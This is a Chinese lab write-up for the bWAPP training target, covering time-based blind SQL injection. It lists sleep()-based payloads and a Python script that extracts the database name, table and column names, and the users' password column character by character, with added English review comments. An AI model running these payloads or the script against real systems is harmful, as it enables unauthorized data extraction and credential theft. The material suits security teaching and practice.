靶机:bWAPP
bug:SQL Injection-Blind-Time-Based
难度等级:low
分析
无论输入什么字符串,都会返回“The result will be sent by e-mail...”。因此首先要确定该处是否存在注入,这里可以参考基于时间的注入方法。本文主要使用if(exp1,exp2,exp3)及sleep函数,根据响应的延迟去判断是否存在注入。
为了判断此处是否存在注入,分别构建了以下两条命令:
- Man of Steel' and if(1=1,sleep(50),1)#
- Man of Steel' and if(1=2,sleep(50),1)#
如果存在注入,命令1中的sleep(50)将会生效,响应的延迟会很高;命令2中的sleep(50)不会生效,响应的延迟不会很高。
经过多次测试,可以看出来命令1的延迟远高于命令2。因此,此处存在注入。
猜解数据库
猜解数据库名称
接下来根据网络延时猜解数据库名称。在猜解数据库名称前首先猜解数据库名称的长度。
“Man of Steel' and if(length(database())=5,sleep(50),1)#”
接下来猜解数据库中包含的表名称。在猜解名称前先猜解所有表格的长度和。
“Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=33,sleep(5),1)#”
猜解表格名称
接下来猜解数据库中包含的表名称。在猜解名称前先猜解所有表格的长度和。
“Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=33,sleep(5),1)#”
接着猜解表名。
“Man of Steel' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),1,1))=21,sleep(5),1)#”
猜解列名称
猜解表格的列名称。在猜解列名称前先猜解所有列名称的总长度。
“Man of Steel' and if((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=11,sleep(5),1)#”
猜解列的名称
“Man of Steel' and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),1,1))=21,sleep(5),1)#”
猜解列的内容
猜解字段的值,首先猜解长度。
“Man of Steel' and if((select length(group_concat(id)) from users)=12,sleep(5),1)#”
猜解字段内容。
“Man of Steel' and if(ascii(mid((select group_concat(id) from users),1,1))=21,sleep(5),1)#”
代码
import requests
from urllib.parse import quote
# Request headers reused by every probe below.
# NOTE(review): a live PHPSESSID and a fixed Referer are embedded in source.
# The session id is a credential tied to one server session; it expires with
# that session and should not be committed (a lab-only value here, but the
# pattern of secrets-in-source is the point to avoid). Because every probe
# reuses the same User-Agent and cookie, the whole run is attributable to a
# single session in server logs.
headers={
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Referer': 'http://192.168.248.174/dvwa/bWAPP/sqli_4.php',
    'Cookie': 'security_level=0; PHPSESSID=442s8ih8ft9d7h1a44jqjg46v1'
}
def guset_db_len():
    """Infer the length of the current database name from response latency.

    One request is sent per candidate length 1..5; the candidate is placed
    in a conditional ``sleep(3)`` inside the ``title`` query parameter, and
    a response that took at least 3 whole seconds is treated as a match.

    Returns:
        int: the last candidate length whose request was slow, or 0 if
        no request exceeded the threshold.
    """
    len_of_db = 0
    print('猜解数据库长度')
    for i in range(1,6):
        url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
        # The candidate length is interpolated into the conditional; the
        # payload is percent-encoded before being appended to the query string.
        title='''Man of Steel' and if(length(database())=%s,sleep(3),1)#'''%i
        title=quote(title)
        url=url+title
        r=requests.get(url,headers=headers)
        # r.elapsed is a timedelta covering the time from sending the request
        # until the response arrived (per the requests docs, up to header
        # parsing, not the end of the body). `.seconds` is the whole-seconds
        # component (an int), so `> 2.5` is only true once at least 3 full
        # seconds passed — i.e. when the injected sleep(3) actually ran.
        # Network jitter alone can cross this threshold and yield a false match.
        if(r.elapsed.seconds>2.5):
            print('length of database:',i)
            len_of_db=i
            # `continue`, not `break`: the remaining candidates are still
            # probed, and a later slow response would overwrite len_of_db.
            continue
    return len_of_db
def guest_db_name(len_of_db):
    """Recover the database name one character at a time from response latency.

    For each position 1..len_of_db, every character in ``char_list`` is
    tried inside a conditional ``sleep(5)``; a response that took at least
    5 whole seconds marks that character as the one at that position.
    Only ASCII letters are candidates, so a digit or underscore in the
    name would never match and that position would be silently skipped.

    Args:
        len_of_db: number of character positions to probe (for example
            the value returned by ``guset_db_len``).

    Returns:
        None. The recovered name is printed, not returned.
    """
    name_db = ''
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    print('猜解数据库名称')
    for i in range(1,len_of_db+1):
        for k in char_list:
            # Assigned but never read; ord(k) is recomputed in the format call.
            k1=ord(k)
            url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
            # mid(database(), i, 1) extracts the i-th character; its ASCII code
            # is compared with the candidate's.
            title = '''Man of Steel' and if(ascii(mid(database(),%s,1))=%s,sleep(5),1)#''' %(i,ord(k))
            url = url + quote(title)
            r = requests.get(url, headers=headers)
            # `.seconds` is the integer whole-seconds part of the timedelta,
            # so this requires at least 5 full seconds of latency.
            if (r.elapsed.seconds > 4.5):
                name_db=name_db+k
                print('第%s位:%s' %(i,k))
                # No break: a second slow response for the same position
                # (e.g. from jitter) would append a second character.
    print('name of database:', name_db)
def guest_table_name_len():
    """Probe the total length of all table names in schema 'bWAPP', then each character.

    Phase 1 tries candidate lengths 2..39 for
    ``group_concat(table_name)`` over ``information_schema.tables`` and
    keeps the last candidate whose request took at least 5 whole seconds.
    Phase 2 probes each position of that comma-joined string against
    ASCII letters and ','. Names longer than 39 characters in total, or
    containing digits/underscores, cannot be recovered by these ranges.

    Returns:
        None. Results are printed only.
    """
    len_of_tables = 0
    # Comma is included because group_concat joins names with ','.
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'
    tables_name=''
    print('表长度的总和')
    for i in range(2, 40):
        url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
        # The schema name is hard-coded; the candidate length is interpolated.
        title = '''Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=%s,sleep(5),1)#''' % i
        title = quote(title)
        url = url + title
        r = requests.get(url, headers=headers)
        # r.elapsed is a timedelta covering the time from sending the request
        # until the response arrived (per the requests docs, up to header
        # parsing). `.seconds` is the integer whole-seconds component, so
        # `> 4.5` only fires after at least 5 full seconds — when the
        # injected sleep(5) actually ran.
        if (r.elapsed.seconds > 4.5):
            print('length of tables:', i)
            len_of_tables = i
            # `continue`, not `break`: later candidates still run and a
            # later slow response would overwrite len_of_tables.
            continue
    # Label is a leftover from the database-name routine; this phase
    # enumerates table-name characters (the string is runtime output and
    # is kept as-is).
    print('猜解数据库名称')
    for i in range(1, len_of_tables + 1):
        for k in char_list:
            k1 = ord(k)
            url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
            title = '''Man of Steel' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),%s,1))=%s,sleep(5),1)#'''%(i,k1)
            title = quote(title)
            url = url + title
            r = requests.get(url, headers=headers)
            if (r.elapsed.seconds > 4.5):
                tables_name = tables_name + k
                print('第%s位:%s' % (i, k))
                # No break after a match; a spurious slow response would
                # append an extra character for this position.
    print('name of tables:', tables_name)
def guest_name_columns():
    """Probe the total length of the column names of table 'users', then each character.

    Phase 1 tries candidate lengths 2..199 for
    ``group_concat(column_name)`` over ``information_schema.columns`` and
    keeps the last candidate whose request took at least 5 whole seconds.
    Phase 2 probes each position of the comma-joined result against ASCII
    letters and ','. The table name is hard-coded and the query is not
    restricted to a schema, so same-named tables in other schemas would
    contribute to the result.

    Returns:
        None. Results are printed only.
    """
    len_of_columns = 0
    # Comma is included because group_concat joins names with ','.
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'
    columns_name = ''
    print('列长度的总和')
    for i in range(2, 200):
        url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
        title = '''Man of Steel' and if((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=%s,sleep(5),1)#''' % i
        title = quote(title)
        url = url + title
        r = requests.get(url, headers=headers)
        # r.elapsed is a timedelta covering the time from sending the request
        # until the response arrived (per the requests docs, up to header
        # parsing). `.seconds` is the integer whole-seconds component, so
        # `> 4.5` only fires after at least 5 full seconds.
        if (r.elapsed.seconds > 4.5):
            print('length of columns:', i)
            len_of_columns = i
            # `continue`, not `break`: every remaining candidate up to 199
            # is still requested.
            continue
    print('猜解列名称')
    for i in range(1, len_of_columns + 1):
        for k in char_list:
            k1 = ord(k)
            url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
            title = '''Man of Steel' and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),%s,1))=%s,sleep(5),1)#''' % (i,k1)
            title = quote(title)
            url = url + title
            r = requests.get(url, headers=headers)
            if (r.elapsed.seconds > 4.5):
                columns_name = columns_name + k
                print('第%s位:%s' % (i, k))
                # No break after a match.
    print('name of columns:', columns_name)
def guest_columns_content():
    """Probe the concatenated values of one column of 'users', then each character.

    The column is fixed to ``password`` by the local ``columns_name``.
    Phase 1 tries candidate lengths 2..399 for ``group_concat(password)``
    and keeps the last candidate whose request took at least 5 whole
    seconds. Phase 2 probes each position against ASCII letters, digits
    and ','. Any character outside that set (e.g. '$', '/', '.') never
    matches, so that position is silently skipped; totals above 399
    characters are also unrecoverable with this range.

    Returns:
        None. Results are printed only.
    """
    len_columns_content = 0
    # Digits are added here because values, unlike identifiers, may contain them.
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,1234567890'
    columns_content = ''
    columns_name='password'
    print('列内容长度的总和')
    for i in range(2, 400):
        url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
        title = '''Man of Steel' and if((select length(group_concat(%s)) from users)=%s,sleep(5),1)#''' %(columns_name,i)
        title = quote(title)
        url = url + title
        r = requests.get(url, headers=headers)
        # r.elapsed is a timedelta covering the time from sending the request
        # until the response arrived (per the requests docs, up to header
        # parsing). `.seconds` is the integer whole-seconds component, so
        # `> 4.5` only fires after at least 5 full seconds.
        if (r.elapsed.seconds > 4.5):
            print('length of columns content:', i)
            len_columns_content = i
            # `continue`, not `break`: all remaining candidates up to 399
            # are still requested.
            continue
    print('列的内容')
    for i in range(1, len_columns_content + 1):
        for k in char_list:
            k1 = ord(k)
            url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
            title = '''Man of Steel' and if(ascii(mid((select group_concat(%s) from users),%s,1))=%s,sleep(5),1)#''' % (columns_name,i, k1)
            title = quote(title)
            url = url + title
            r = requests.get(url, headers=headers)
            if (r.elapsed.seconds > 4.5):
                columns_content = columns_content + k
                print('第%s位:%s' % (i, k))
                # No break after a match.
    print('columns_content:', columns_content)
if __name__=='__main__':
    # Only the column-content stage runs by default; the earlier stages are
    # left commented out, so the database length/name, table names and
    # column names are assumed to be known already. guset_db_len() is
    # never invoked from here.
    #guest_db_name(5)
    #guest_table_name_len()
    #guest_name_columns()
    guest_columns_content()